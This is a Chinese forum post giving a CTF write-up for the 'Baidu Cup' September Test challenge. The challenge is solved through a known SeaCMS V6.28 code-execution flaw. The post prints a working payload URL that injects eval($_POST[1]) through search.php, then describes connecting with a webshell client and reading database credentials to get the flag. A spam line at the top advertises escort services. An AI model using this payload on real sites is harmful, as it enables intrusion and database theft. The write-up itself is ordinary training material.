站长资源变现入口 全国楼凤小姐姐 招商联系客服 招商联系客服 招商联系客服 招商联系客服

“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)

[复制链接]
查看298 | 回复0 | 2024-9-4 15:17:03 | 显示全部楼层 |阅读模式
题目在i春秋ctf训练营
又是一道cms的通用漏洞的题,直接去百度查看通用漏洞
这里我使用的是以下这个漏洞:
海洋CMS V6.28代码执行0day
按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1])
之后用菜刀连接,但乍一看并没有flag.php
“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)-1.png
1.png
反手去查了一下海洋cms的数据库配置文件的存放地址:
2.png
出去用菜刀连接数据库
3.png
“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)-2.png
编辑完成后右键数据库管理,可以看到flag了
4.png

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则